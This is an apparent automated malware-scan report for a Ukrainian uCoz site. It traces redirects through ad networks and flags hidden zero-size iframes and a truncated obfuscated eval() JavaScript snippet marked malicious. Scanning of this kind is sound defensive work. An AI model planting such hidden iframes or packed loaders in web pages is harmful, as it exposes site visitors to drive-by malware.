Scanned pages/files
Request | Server response | Status |
http://advokat-ua.at.ua/dir/0-0-1-7-20 | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Sat, 26 Sep 2015 13:42:07 GMT Location: http://bux-arhiv.ucoz.com/ Server: uServ/3.2.2 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 2advokat-uauCoz=; path=/; expires=Thu, 26-Sep-2013 13:42:07 GMT; domain=.advokat-ua.at.ua; Set-Cookie: 2advokat-uadrrd=BwCvoAZW; path=/dir; expires=Sun, 25-Sep-2016 13:42:07 GMT; domain=.advokat-ua.at.ua; | clean |
http://bux-arhiv.ucoz.com/ | 200 OK Content-Length: 108135 Content-Type: text/html | clean |
http://s36.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://link.links-wm.ru/?id=5140&t=1 | 200 OK Content-Length: 3315 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://web-sar.ru/index.html <iframe src="http://web-sar.ru/index.html" width="0" height="0" frameborder="0"> | ||
http://link.links-wm.ru/test404page.js | 404 Not Found Content-Length: 317 Content-Type: text/html | clean |
http://p73608.adskape.ru/adout.js?p=73608&t=8&tx=3&ty=1 | 200 OK Content-Length: 399 Content-Type: text/html | clean |
http://p73608.adskape.ru/adout.php?p=73608&t=8&tx=3&ty=1&sid=' + sid + ref + topfr +' | 200 OK Content-Length: 2533 Content-Type: text/html | clean |
http://p73608.adskape.ru/adclick.php?id=10554&p=73608&tid=101f7b1667b4797e65b816d6a0616b64&tid1=92945c05fb9f6474f67458912e42882c&tid2=3384426&psid=0 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Sep 2015 13:42:11 GMT Location: http://nick.olegarxiya.com/?page_id=2 Server: nginx/1.2.4 Content-Type: text/html Set-Cookie: click[]=10554; expires=Sat, 26-Sep-2015 21:00:00 GMT X-Powered-By: PHP/5.4.7 | clean |
http://nick.olegarxiya.com/?page_id=2 | HTTP/1.1 302 Found Connection: close Date: Sat, 26 Sep 2015 13:42:10 GMT Location: http://nick.olegarxiya.com/cgi-sys/suspendedpage.cgi?page_id=2 Server: Apache Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://nick.olegarxiya.com/cgi-sys/suspendedpage.cgi?page_id=2 | 200 OK Content-Length: 3639 Content-Type: text/html | clean |
http://p73608.adskape.ru/adclick.php?id=14081&p=73608&tid=101f7b1667b4797e65b816d6a0616b64&tid1=95c78b6e593cb612d7aa29f570c8e890&tid2=3384426&psid=0 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Sep 2015 13:42:12 GMT Location: http://vasiliy777.qwertybiz.com Server: nginx/1.2.4 Content-Type: text/html Set-Cookie: click[]=14081; expires=Sat, 26-Sep-2015 21:00:00 GMT X-Powered-By: PHP/5.4.7 | clean |
http://vasiliy777.qwertybiz.com/ | 200 OK Content-Length: 10058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('<p q="t/u">v.x(r(\'%d%5%2%3%8%7%1%g%1%f%7%9%e%a%1%9%i%1%6%j%b%k%b%5%2%3%8%7%1%a%c%s%m%2%w%o%9%F%1%n%h%3%8%1%9%D%0%d%5%2%0%4%0%3%8%7%1%g%1%0%4%0%f%7%9%e%a%1%9% Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://qwertypay.com/rbk.php?aff=vasiliy777 <iframe name="rt" src="http://qwertypay.com/rbk.php?aff=vasiliy777" width="1" height="1" frameborder="0" scrolling="no"> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js | 200 OK Content-Length: 93637 Content-Type: text/javascript | clean |
http://qwertybiz.com/templates_new/s1/2/qwertypay_comslider.js | 200 OK Content-Length: 68921 Content-Type: application/x-javascript | clean |
http://qwertypay.com/any/shop_tovar/2/qwertypaycom.js?aff=vasiliy777&line&color=37b39a&blocks=4&width=240 | 200 OK Content-Length: 242 Content-Type: text/html | clean |
http://qwertypay.com/any/buy_buttons/regbut/jswf/swfobject.js | 200 OK Content-Length: 9759 Content-Type: application/x-javascript | clean |
http://cnt.rambler.ru/top100.jcn?1962306 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: advokat-ua.at.ua
Result:
GET / HTTP/1.1
Host: advokat-ua.at.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: advokat-ua.at.ua
Referer: http://www.google.com/search?q=advokat-ua.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: advokat-ua.at.ua
Referer: http://www.google.com/search?q=advokat-ua.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=advokat-ua.at.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://advokat-ua.at.ua/
Result: advokat-ua.at.ua is not infected or malware details are not published yet.
Result: advokat-ua.at.ua is not infected or malware details are not published yet.